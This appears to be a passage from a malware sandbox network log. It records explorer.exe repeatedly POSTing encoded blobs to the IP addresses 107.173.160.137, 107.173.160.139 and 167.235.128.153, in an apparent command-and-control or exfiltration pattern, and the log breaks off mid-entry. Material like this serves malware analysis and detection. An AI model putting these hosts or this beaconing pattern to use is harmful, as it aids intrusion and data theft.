2024-07-24 17:57:54 UTC	1267	OUT	Data Raw: 5a 33 37 49 4e 74 5a 4c 32 35 66 50 6b 73 63 6b 4d 77 65 7a 36 78 50 67 6c 30 33 61 63 37 53 31 69 31 61 6e 72 53 5a 66 78 6f 47 2f 5a 6e 35 66 69 39 65 64 75 33 45 72 59 63 65 78 47 75 4c 5a 78 53 51 49 63 2f 47 38 4f 57 38 38 4e 4d 76 42 48 51 77 74 6e 6b 43 32 6e 44 49 53 62 37 7a 78 51 4e 75 35 67 64 67 63 4d 38 4a 69 34 55 30 71 75 36 6b 38 6d 4f 42 73 79 37 65 4c 52 58 6a 75 4a 6b 77 49 4d 5a 4b 75 4f 2f 65 61 33 51 35 6c 65 50 38 79 66 43 6c 44 55 59 4e 4e 55 31 6c 6f 6f 6d 61 78 2b 39 53 47 51 41 69 6f 32 2f 6d 2f 62 6a 47 6f 78 37 6e 7a 71 67 72 5a 34 78 78 7a 45 37 78 33 32 74 6c 68 33 42 74 64 67 4e 54 2f 49 78 6d 45 66 4d 76 66 6d 74 72 4a 58 42 79 6e 67 46 56 64 73 78 4d 43 6d 2b 47 39 76 79 79 65 30 77 51 72 38 31 73 2f 6e 43 38 54 4e 35 6a Data Ascii: Z37INtZL25fPksckMwez6xPgl03ac7S1i1anrSZfxoG/Zn5fi9edu3ErYcexGuLZxSQIc/G8OW88NMvBHQwtnkC2nDISb7zxQNu5gdgcM8Ji4U0qu6k8mOBsy7eLRXjuJkwIMZKuO/ea3Q5leP8yfClDUYNNU1loomax+9SGQAio2/m/bjGox7nzqgrZ4xxzE7x32tlh3BtdgNT/IxmEfMvfmtrJXByngFVdsxMCm+G9vyye0wQr81s/nC8TN5j
2024-07-24 17:57:55 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:55 UTC	685	IN	Data Raw: 4e 51 45 2f 48 46 76 31 79 72 6a 6f 51 49 63 48 64 38 6e 79 37 71 59 4d 45 44 50 67 6b 6d 51 4a 77 66 2f 2b 2b 2b 42 33 78 59 6a 6b 47 6e 2f 4e 37 47 52 45 39 4f 56 37 68 64 47 66 6f 49 57 7a 65 5a 6c 6c 4d 6f 48 44 61 30 2b 41 4a 39 71 49 79 71 41 5a 6f 70 52 44 5a 55 5a 36 31 49 54 68 67 66 4f 34 48 62 66 72 48 55 61 47 47 37 4c 58 46 45 6a 57 73 30 47 2b 42 70 47 36 31 75 5a 48 42 6f 66 62 4c 79 70 53 75 6e 59 4a 34 72 41 4a 6c 73 64 2f 55 78 6a 37 44 64 38 63 42 58 56 44 4d 6c 75 6c 6d 2f 76 70 58 56 39 6c 59 4b 53 66 63 78 37 7a 31 77 67 38 48 2f 49 42 46 56 6a 37 69 74 66 35 59 39 4b 69 54 51 6e 78 42 54 36 2b 6b 46 54 2f 58 53 57 55 6b 5a 63 72 54 76 79 75 57 2f 66 4b 42 2b 68 4d 47 59 49 6c 77 77 72 7a 6e 5a 2b 74 51 71 70 73 48 6c 41 76 59 6c 2f Data Ascii: NQE/HFv1yrjoQIcHd8ny7qYMEDPgkmQJwf/+++B3xYjkGn/N7GRE9OV7hdGfoIWzeZllMoHDa0+AJ9qIyqAZopRDZUZ61IThgfO4HbfrHUaGG7LXFEjWs0G+BpG61uZHBofbLypSunYJ4rAJlsd/Uxj7Dd8cBXVDMlulm/vpXV9lYKSfcx7z1wg8H/IBFVj7itf5Y9KiTQnxBT6+kFT/XSWUkZcrTvyuW/fKB+hMGYIlwwrznZ+tQqpsHlAvYl/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.10	49813	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:56 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:56 UTC	1122	OUT	Data Raw: 46 6e 77 45 76 59 71 72 4f 38 70 42 4a 41 6c 56 33 34 45 66 6d 53 7a 6e 6c 38 77 57 73 64 61 32 64 34 66 78 4b 68 61 44 59 69 75 34 4d 41 48 33 44 39 32 6e 72 78 77 31 67 74 64 68 56 4c 44 53 73 51 56 6e 48 4e 73 72 47 5a 50 53 72 39 6d 7a 46 65 57 4f 6c 44 57 57 78 30 33 42 39 41 52 67 35 4a 56 4d 41 4f 34 42 30 71 41 73 68 74 34 52 78 54 4a 79 76 55 72 41 55 6d 67 55 6e 54 4a 4f 6f 57 70 4a 64 74 57 38 63 75 30 70 30 34 44 38 42 4f 58 78 71 43 61 65 4a 62 49 46 42 7a 30 42 6f 65 54 5a 51 71 77 6e 68 47 59 54 39 4f 57 2b 6c 49 72 48 78 2b 33 32 66 66 56 4a 56 54 72 46 4b 6f 63 30 72 6f 52 43 49 6a 41 62 51 50 38 45 78 4c 6e 6e 66 41 6e 36 56 75 66 70 2f 56 44 49 67 41 67 4f 78 4c 61 6e 34 34 4a 67 71 64 2f 54 63 30 35 36 6b 6f 2b 67 77 4c 33 68 52 32 59 Data Ascii: FnwEvYqrO8pBJAlV34EfmSznl8wWsda2d4fxKhaDYiu4MAH3D92nrxw1gtdhVLDSsQVnHNsrGZPSr9mzFeWOlDWWx03B9ARg5JVMAO4B0qAsht4RxTJyvUrAUmgUnTJOoWpJdtW8cu0p04D8BOXxqCaeJbIFBz0BoeTZQqwnhGYT9OW+lIrHx+32ffVJVTrFKoc0roRCIjAbQP8ExLnnfAn6Vufp/VDIgAgOxLan44Jgqd/Tc056ko+gwL3hR2Y
2024-07-24 17:57:57 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:57 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:57 UTC	685	IN	Data Raw: 56 53 73 61 36 6b 65 31 75 75 6b 65 52 47 4f 74 6e 7a 41 49 67 77 52 4a 56 35 61 4a 6b 30 55 41 52 78 51 33 59 51 31 57 6b 64 52 66 66 45 61 48 33 41 75 37 6e 6a 71 41 46 70 63 72 31 73 5a 39 64 6d 31 6a 35 4c 70 4f 74 53 4c 32 7a 52 39 63 32 54 58 2f 49 2f 2f 70 4a 42 52 4a 66 4a 78 76 44 50 36 46 4a 61 53 5a 41 57 4b 55 39 4d 65 38 6e 31 45 71 5a 79 34 2f 77 49 41 58 6e 62 62 45 4f 51 6d 37 77 4a 2f 2f 63 33 33 49 42 67 61 34 62 71 6a 68 38 56 4e 7a 30 43 66 33 6f 30 35 34 54 44 63 49 4c 74 42 33 61 78 69 66 45 49 55 75 38 57 71 45 79 36 6c 77 33 75 63 71 56 6c 6b 63 37 63 39 42 66 6a 53 2b 68 53 44 4a 35 62 46 2f 53 47 66 57 65 47 78 57 6a 4e 39 61 79 64 61 67 61 31 76 4b 79 32 78 65 58 5a 79 30 33 50 34 55 42 67 78 6e 2b 43 6d 6f 31 79 47 5a 62 59 42 Data Ascii: VSsa6ke1uukeRGOtnzAIgwRJV5aJk0UARxQ3YQ1WkdRffEaH3Au7njqAFpcr1sZ9dm1j5LpOtSL2zR9c2TX/I//pJBRJfJxvDP6FJaSZAWKU9Me8n1EqZy4/wIAXnbbEOQm7wJ//c33IBga4bqjh8VNz0Cf3o054TDcILtB3axifEIUu8WqEy6lw3ucqVlkc7c9BfjS+hSDJ5bF/SGfWeGxWjN9aydaga1vKy2xeXZy03P4UBgxn+Cmo1yGZbYB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.10	49814	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:57:58 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:57:58 UTC	1122	OUT	Data Raw: 67 6d 63 4f 36 58 55 33 52 7a 59 6f 36 30 6d 78 6e 69 36 42 66 49 6c 55 56 6e 48 45 4d 66 79 55 34 4a 79 5a 70 58 59 78 58 30 41 79 70 53 5a 69 65 7a 57 39 6f 74 71 54 34 47 43 41 69 6a 73 61 54 36 43 61 4d 4a 47 69 72 73 31 6d 35 61 45 62 77 67 77 41 49 46 6b 50 39 53 39 4b 58 6f 45 4f 4d 76 4c 4a 4d 4f 62 76 46 43 79 51 4b 4a 76 61 72 6c 64 50 33 38 6b 2f 6d 73 4b 33 35 2f 78 70 75 6d 4b 56 67 6f 73 4d 63 79 47 4b 59 62 53 2b 54 58 36 67 77 76 43 5a 75 61 6a 44 47 39 64 4c 5a 4e 67 38 6a 58 78 57 68 65 79 68 61 65 66 67 31 4a 6c 37 4a 52 62 30 2b 52 79 6a 76 67 41 4a 35 59 64 70 4e 47 35 59 68 33 68 31 4a 46 77 73 30 41 4c 68 4c 65 62 38 37 73 70 69 42 77 65 44 66 36 50 61 4c 42 55 54 78 32 62 74 66 42 4a 72 7a 43 58 74 77 31 2f 70 45 39 31 4a 49 73 78 Data Ascii: gmcO6XU3RzYo60mxni6BfIlUVnHEMfyU4JyZpXYxX0AypSZiezW9otqT4GCAijsaT6CaMJGirs1m5aEbwgwAIFkP9S9KXoEOMvLJMObvFCyQKJvarldP38k/msK35/xpumKVgosMcyGKYbS+TX6gwvCZuajDG9dLZNg8jXxWheyhaefg1Jl7JRb0+RyjvgAJ5YdpNG5Yh3h1JFws0ALhLeb87spiBweDf6PaLBUTx2btfBJrzCXtw1/pE91JIsx
2024-07-24 17:57:59 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:57:59 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:57:59 UTC	685	IN	Data Raw: 6a 42 65 67 36 53 51 58 71 70 6b 66 77 31 45 45 32 51 35 30 63 79 71 68 30 78 47 52 58 70 4a 6d 57 59 67 67 42 47 75 73 6d 6c 70 32 54 4f 39 4d 36 58 78 4d 6a 72 77 71 31 36 68 41 72 47 54 47 52 43 35 5a 74 4b 51 45 50 68 34 4d 6d 58 77 6f 65 42 30 43 71 4c 6d 42 6b 48 2f 73 43 53 39 4d 31 43 4c 62 56 78 67 42 53 69 36 45 54 57 2f 76 76 55 35 31 67 4d 2f 49 5a 55 51 34 31 79 48 30 6a 38 52 4b 4b 73 46 48 4b 43 4f 55 55 75 51 6a 79 2f 4e 35 4f 6b 35 45 34 76 4c 4f 39 69 4c 35 73 57 62 6c 38 4a 78 50 43 4b 41 54 68 4d 72 5a 6b 4b 59 73 6f 46 58 61 78 6b 57 38 6a 6e 70 77 59 62 6e 33 57 35 73 43 6c 65 68 58 35 6a 74 2b 78 6c 4f 37 61 41 47 59 39 2b 6f 59 78 2f 44 33 6c 71 36 70 6b 76 34 44 48 71 39 4f 57 4d 37 55 66 72 59 33 38 6f 46 7a 42 6b 35 2b 38 39 5a Data Ascii: jBeg6SQXqpkfw1EE2Q50cyqh0xGRXpJmWYggBGusmlp2TO9M6XxMjrwq16hArGTGRC5ZtKQEPh4MmXwoeB0CqLmBkH/sCS9M1CLbVxgBSi6ETW/vvU51gM/IZUQ41yH0j8RKKsFHKCOUUuQjy/N5Ok5E4vLO9iL5sWbl8JxPCKAThMrZkKYsoFXaxkW8jnpwYbn3W5sClehX5jt+xlO7aAGY9+oYx/D3lq6pkv4DHq9OWM7UfrY38oFzBk5+89Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.10	49816	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:00 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:00 UTC	1122	OUT	Data Raw: 50 50 64 59 53 72 34 2f 4a 34 63 32 34 38 6e 39 46 36 48 6c 51 56 75 55 64 57 36 61 48 69 2b 43 4f 54 5a 68 70 68 42 46 4c 58 66 7a 55 44 45 53 72 54 76 6b 4a 65 36 58 72 57 5a 78 61 59 74 52 2b 64 43 4c 71 70 7a 69 75 51 36 39 39 61 68 6b 55 33 72 77 45 71 6d 44 51 64 37 77 7a 34 53 6f 48 49 7a 57 55 58 41 36 6b 66 54 59 6e 2f 62 64 43 43 56 79 34 46 34 51 6c 33 43 68 67 4f 50 42 54 4b 77 6b 31 55 4d 45 49 66 4f 6f 57 70 67 37 30 63 51 79 61 2f 53 43 59 46 52 32 4c 47 5a 62 2f 63 64 5a 6f 63 56 64 58 54 36 65 41 39 7a 76 36 4c 79 6e 46 68 30 43 4f 42 4d 4d 39 6e 43 69 69 69 79 39 6d 4c 6e 44 32 6b 59 33 52 6c 44 67 4f 64 68 50 2b 4c 76 78 6a 57 4d 49 6f 69 73 70 4d 43 6e 71 31 32 78 6b 73 4c 47 62 56 46 47 4e 6c 54 32 4f 33 70 6a 4f 70 62 35 31 52 63 31 Data Ascii: PPdYSr4/J4c248n9F6HlQVuUdW6aHi+COTZhphBFLXfzUDESrTvkJe6XrWZxaYtR+dCLqpziuQ699ahkU3rwEqmDQd7wz4SoHIzWUXA6kfTYn/bdCCVy4F4Ql3ChgOPBTKwk1UMEIfOoWpg70cQya/SCYFR2LGZb/cdZocVdXT6eA9zv6LynFh0COBMM9nCiiiy9mLnD2kY3RlDgOdhP+LvxjWMIoispMCnq12xksLGbVFGNlT2O3pjOpb51Rc1
2024-07-24 17:58:01 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:01 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:01 UTC	685	IN	Data Raw: 6a 76 6c 77 75 74 53 54 35 30 4f 4f 5a 73 57 46 6c 67 4c 5a 6c 77 34 47 51 4a 39 35 37 6b 35 5a 36 37 50 41 33 4f 56 2b 31 59 4e 33 47 68 41 61 53 55 55 44 6e 70 46 55 75 73 65 50 70 2b 55 58 62 4d 38 6f 76 57 6e 33 2b 44 4b 70 45 50 6a 70 54 55 41 59 78 39 31 41 46 58 76 6b 51 2f 6a 44 6c 56 4c 58 4c 6c 76 36 2f 42 33 44 41 69 33 73 68 76 63 48 2b 45 59 2b 39 70 63 32 30 68 30 34 34 71 74 73 61 34 79 66 4a 53 4d 39 76 2f 65 42 75 30 54 43 73 6b 2f 77 48 39 37 4c 77 78 39 38 65 57 73 4d 30 45 58 31 61 63 53 4c 44 6d 49 2b 5a 39 67 49 55 47 2f 51 65 55 43 6b 49 52 57 62 70 66 66 58 4f 2f 65 79 56 78 47 76 61 38 31 2f 32 37 5a 51 47 64 61 70 5a 65 6b 46 69 75 46 41 37 38 5a 31 46 54 56 32 4e 4f 51 45 56 35 76 79 7a 51 4a 66 6d 6c 77 70 50 73 69 61 39 58 54 Data Ascii: jvlwutST50OOZsWFlgLZlw4GQJ957k5Z67PA3OV+1YN3GhAaSUUDnpFUusePp+UXbM8ovWn3+DKpEPjpTUAYx91AFXvkQ/jDlVLXLlv6/B3DAi3shvcH+EY+9pc20h044qtsa4yfJSM9v/eBu0TCsk/wH97Lwx98eWsM0EX1acSLDmI+Z9gIUG/QeUCkIRWbpffXO/eyVxGva81/27ZQGdapZekFiuFA78Z1FTV2NOQEV5vyzQJfmlwpPsia9XT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.10	49817	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:02 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:58:02 UTC	1267	OUT	Data Raw: 4e 4e 6c 44 6c 62 6d 61 66 77 35 70 2f 6f 43 59 6e 52 69 6d 53 70 36 46 4e 78 62 72 67 58 62 62 41 42 7a 6f 4b 61 36 63 4b 78 59 71 6b 57 56 41 68 65 6b 5a 43 79 55 64 34 63 61 43 37 65 50 65 51 70 32 45 57 63 2b 7a 30 58 79 7a 37 4f 68 51 48 4d 77 38 62 67 45 32 72 61 4e 74 44 7a 43 66 56 6d 47 70 6a 63 44 46 48 54 63 4d 76 37 58 70 74 39 4a 4b 79 42 6f 70 6f 5a 74 6b 34 45 75 32 76 5a 44 61 67 6a 57 57 4f 62 67 4c 2b 55 42 79 66 42 6a 6a 6b 6a 49 47 55 4c 74 35 32 4a 68 49 67 31 69 49 77 2b 34 65 35 77 32 6b 62 76 45 78 6d 7a 2f 4c 38 70 4c 6a 74 48 2f 62 54 6e 6a 77 45 46 56 48 61 56 2b 41 70 30 35 65 33 65 66 71 7a 6a 41 37 4d 47 77 35 43 70 79 57 42 59 74 4b 6d 35 69 55 79 77 6b 44 31 4c 4e 31 4a 37 32 36 55 45 38 78 4f 52 54 74 67 32 78 61 61 56 46 Data Ascii: NNlDlbmafw5p/oCYnRimSp6FNxbrgXbbABzoKa6cKxYqkWVAhekZCyUd4caC7ePeQp2EWc+z0Xyz7OhQHMw8bgE2raNtDzCfVmGpjcDFHTcMv7Xpt9JKyBopoZtk4Eu2vZDagjWWObgL+UByfBjjkjIGULt52JhIg1iIw+4e5w2kbvExmz/L8pLjtH/bTnjwEFVHaV+Ap05e3efqzjA7MGw5CpyWBYtKm5iUywkD1LN1J726UE8xORTtg2xaaVF
2024-07-24 17:58:03 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:03 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:03 UTC	685	IN	Data Raw: 55 7a 4c 61 66 66 45 56 75 4d 73 55 68 34 2b 57 2b 54 45 76 71 30 57 38 77 2f 39 64 67 59 6d 6c 52 61 67 4e 51 42 45 31 61 68 44 4c 36 59 4b 39 31 58 47 75 31 4b 38 79 76 4b 70 6b 46 68 4b 4b 4d 58 6a 55 7a 45 38 5a 79 45 77 38 39 46 54 42 6d 44 36 41 65 41 63 6e 75 72 65 34 48 42 6d 67 50 70 46 2b 47 75 64 45 42 32 2b 56 45 6b 66 49 65 67 33 34 55 65 30 50 63 6a 46 57 4e 43 75 69 66 4f 74 58 76 53 4f 6a 75 73 4e 69 6a 66 41 4b 45 48 74 4f 74 52 64 35 63 64 47 68 43 68 59 42 32 61 73 36 67 42 76 54 39 67 79 6a 56 76 6b 4b 62 54 73 6c 76 36 57 61 4e 30 66 48 66 58 72 55 54 55 42 41 45 44 6b 33 30 73 6e 69 54 50 47 43 34 65 4f 69 67 2b 61 37 41 39 69 58 35 31 72 56 77 30 34 4f 35 4b 38 6f 64 32 35 4e 49 61 55 61 59 6d 6b 31 4f 68 71 59 77 52 5a 69 56 53 71 Data Ascii: UzLaffEVuMsUh4+W+TEvq0W8w/9dgYmlRagNQBE1ahDL6YK91XGu1K8yvKpkFhKKMXjUzE8ZyEw89FTBmD6AeAcnure4HBmgPpF+GudEB2+VEkfIeg34Ue0PcjFWNCuifOtXvSOjusNijfAKEHtOtRd5cdGhChYB2as6gBvT9gyjVvkKbTslv6WaN0fHfXrUTUBAEDk30sniTPGC4eOig+a7A9iX51rVw04O5K8od25NIaUaYmk1OhqYwRZiVSq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.10	49818	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:04 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:04 UTC	1122	OUT	Data Raw: 44 71 63 36 52 30 69 41 44 50 4b 70 38 33 79 62 70 68 65 79 53 50 73 77 38 51 70 41 63 64 66 41 55 6c 30 56 76 73 43 4d 55 78 50 7a 44 44 6a 37 41 42 75 4f 66 53 58 46 2f 67 66 63 39 57 42 4d 38 33 52 72 6a 61 47 5a 44 7a 33 77 4e 42 68 30 68 30 6c 50 35 51 57 2f 6c 63 4a 49 62 2b 6f 79 2f 65 59 62 73 6f 30 56 68 44 33 63 35 2b 61 42 76 43 33 47 74 62 71 51 6d 4e 55 2f 73 47 49 59 61 2f 37 50 2f 4a 65 33 31 34 2f 77 39 69 74 49 7a 30 66 59 57 54 45 76 69 6e 59 34 70 71 6c 2b 4d 31 4d 73 53 59 73 54 4b 6e 47 41 4e 63 67 69 72 46 48 2b 70 77 6a 51 6c 2f 54 35 70 4b 6c 42 5a 6e 41 4b 76 53 34 4c 45 41 64 66 67 35 55 2b 4b 42 45 67 68 66 41 64 41 34 47 6e 6a 4b 38 6d 2f 4c 31 71 65 4e 4d 55 6b 77 72 44 33 38 31 2b 2b 65 79 36 57 59 64 69 34 4b 31 4b 4f 4c 4d Data Ascii: Dqc6R0iADPKp83ybpheySPsw8QpAcdfAUl0VvsCMUxPzDDj7ABuOfSXF/gfc9WBM83RrjaGZDz3wNBh0h0lP5QW/lcJIb+oy/eYbso0VhD3c5+aBvC3GtbqQmNU/sGIYa/7P/Je314/w9itIz0fYWTEvinY4pql+M1MsSYsTKnGANcgirFH+pwjQl/T5pKlBZnAKvS4LEAdfg5U+KBEghfAdA4GnjK8m/L1qeNMUkwrD381++ey6WYdi4K1KOLM
2024-07-24 17:58:05 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:05 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:05 UTC	685	IN	Data Raw: 63 43 41 55 4d 2f 4b 78 59 43 73 41 71 44 33 56 2b 5a 55 7a 37 61 67 72 63 61 4f 74 5a 58 41 49 57 45 72 34 63 39 4c 62 67 42 6d 6f 4a 48 6d 72 7a 35 52 31 46 36 63 43 54 4e 6c 38 65 6a 57 32 65 45 66 69 6a 61 34 33 2f 6a 58 31 44 4d 39 39 4c 38 5a 70 70 59 36 39 78 2b 37 61 61 72 63 51 6a 39 34 58 39 67 56 58 62 4c 38 79 65 76 38 6b 6d 70 32 30 6b 44 67 56 68 75 55 31 41 70 34 6e 78 74 79 42 61 36 62 66 6d 42 44 6f 47 58 75 36 64 69 51 50 58 32 53 49 41 4b 62 47 6f 37 52 34 75 6d 59 5a 33 77 50 65 44 41 4f 32 34 38 77 35 54 63 68 43 73 6f 51 36 67 70 74 50 35 4e 74 6c 4d 61 6e 33 53 34 69 2f 41 6a 6b 43 47 59 73 5a 6f 59 46 38 52 64 68 32 55 6d 64 65 5a 77 6a 72 38 72 61 34 52 61 64 70 53 79 61 45 30 78 6d 77 5a 64 53 66 47 4f 4c 69 59 4c 42 5a 57 6e 46 Data Ascii: cCAUM/KxYCsAqD3V+ZUz7agrcaOtZXAIWEr4c9LbgBmoJHmrz5R1F6cCTNl8ejW2eEfija43/jX1DM99L8ZppY69x+7aarcQj94X9gVXbL8yev8kmp20kDgVhuU1Ap4nxtyBa6bfmBDoGXu6diQPX2SIAKbGo7R4umYZ3wPeDAO248w5TchCsoQ6gptP5NtlMan3S4i/AjkCGYsZoYF8Rdh2UmdeZwjr8ra4RadpSyaE0xmwZdSfGOLiYLBZWnF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.10	49819	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:06 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:06 UTC	1122	OUT	Data Raw: 4e 4b 42 54 49 50 4e 73 46 79 5a 6c 78 2b 50 31 4d 38 30 37 76 52 39 68 49 6b 31 64 72 76 6f 43 6f 65 55 39 66 4c 54 70 55 56 69 2f 58 36 6f 4b 5a 6b 66 4c 64 64 50 36 4b 73 69 4b 32 67 55 4f 44 66 62 63 5a 4e 42 2b 39 53 33 46 6e 5a 30 4a 79 4a 6e 66 33 5a 44 4c 41 5a 61 42 4e 6c 6e 6a 31 4a 2f 74 53 32 45 64 44 56 64 69 4f 62 4e 47 78 54 6e 4e 6d 35 46 47 37 75 58 4c 55 4a 45 62 6c 72 78 56 76 4c 32 70 63 30 6b 4a 70 71 76 6f 70 67 55 4f 31 2b 77 78 6c 36 78 50 6f 4c 59 46 71 42 6a 65 63 49 6b 6e 59 43 54 42 41 42 70 55 4f 6d 38 47 46 6d 56 4b 51 54 57 31 4f 75 73 44 77 5a 37 71 42 66 47 50 4f 7a 4a 38 78 51 6b 59 62 43 32 6f 45 74 52 56 78 6b 33 6e 53 5a 76 42 4e 62 71 72 46 78 72 4b 79 30 73 46 75 74 6f 2b 41 64 41 43 59 79 48 72 34 4d 57 30 62 45 68 Data Ascii: NKBTIPNsFyZlx+P1M807vR9hIk1drvoCoeU9fLTpUVi/X6oKZkfLddP6KsiK2gUODfbcZNB+9S3FnZ0JyJnf3ZDLAZaBNlnj1J/tS2EdDVdiObNGxTnNm5FG7uXLUJEblrxVvL2pc0kJpqvopgUO1+wxl6xPoLYFqBjecIknYCTBABpUOm8GFmVKQTW1OusDwZ7qBfGPOzJ8xQkYbC2oEtRVxk3nSZvBNbqrFxrKy0sFuto+AdACYyHr4MW0bEh
2024-07-24 17:58:07 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:07 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:07 UTC	685	IN	Data Raw: 6a 52 37 44 79 5a 38 6d 6a 46 68 77 51 4c 66 68 58 5a 6f 4b 55 66 6a 39 50 32 49 7a 6e 7a 34 46 6b 61 71 59 4e 69 38 59 57 37 4c 69 73 43 4e 73 54 58 75 70 31 42 72 53 32 42 4b 37 74 55 49 56 34 70 50 6d 4a 65 65 62 74 33 30 36 52 68 6c 2b 72 49 48 6a 73 2f 2f 34 62 68 63 46 59 49 30 37 6a 6e 6a 74 47 56 34 31 54 64 31 36 74 45 55 32 73 57 69 4a 69 63 54 33 77 65 47 4e 59 78 49 4f 2f 43 42 34 66 50 71 4a 61 77 6a 79 7a 70 33 30 2f 47 46 53 71 5a 56 6c 66 37 66 31 37 66 4e 44 64 66 4f 42 56 53 30 2f 6f 55 4d 58 37 49 4e 4a 36 38 38 6f 35 63 70 77 42 2b 38 48 36 6d 78 75 2f 75 64 49 41 4e 77 71 4f 71 56 6e 63 62 51 4e 43 42 6b 73 33 4a 50 39 38 6a 4c 4e 52 4f 2f 30 45 32 2f 59 53 66 47 4a 48 78 4c 31 7a 79 54 58 6d 48 52 79 41 41 68 39 79 77 55 6d 37 6d 69 Data Ascii: jR7DyZ8mjFhwQLfhXZoKUfj9P2Iznz4FkaqYNi8YW7LisCNsTXup1BrS2BK7tUIV4pPmJeebt306Rhl+rIHjs//4bhcFYI07jnjtGV41Td16tEU2sWiJicT3weGNYxIO/CB4fPqJawjyzp30/GFSqZVlf7f17fNDdfOBVS0/oUMX7INJ688o5cpwB+8H6mxu/udIANwqOqVncbQNCBks3JP98jLNRO/0E2/YSfGJHxL1zyTXmHRyAAh9ywUm7mi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.10	49820	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:08 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:08 UTC	1122	OUT	Data Raw: 54 35 50 2f 77 44 53 31 4a 63 45 64 67 77 76 4e 57 4c 36 4c 71 31 65 74 36 7a 31 71 6a 63 64 73 59 30 59 57 4d 35 45 46 73 62 69 72 2b 67 33 43 72 68 78 73 71 4f 63 64 73 57 52 45 63 5a 76 68 72 57 4b 64 68 74 64 6c 53 75 53 42 31 2b 36 62 42 6b 30 64 38 53 62 34 30 72 56 58 4a 6e 57 50 30 53 6a 6e 35 2b 73 50 77 33 7a 74 57 58 50 59 47 44 57 6c 44 77 4d 36 44 35 48 34 65 31 56 72 6c 33 55 61 32 72 4b 32 58 4a 6b 4c 70 4b 6a 72 49 39 56 70 7a 6a 67 36 6c 39 30 61 42 76 36 48 41 71 48 58 77 53 76 32 39 2f 62 47 4f 39 33 38 62 76 49 48 7a 6e 57 42 5a 6a 43 56 36 79 33 67 76 73 50 4b 7a 70 58 6d 78 6c 48 38 76 38 42 77 7a 6b 5a 6b 72 74 61 6e 6e 6a 51 51 70 51 30 72 64 69 74 57 49 70 52 34 6d 75 35 4e 4c 44 68 39 5a 69 66 49 45 76 4f 4c 4a 75 6f 33 53 76 4b Data Ascii: 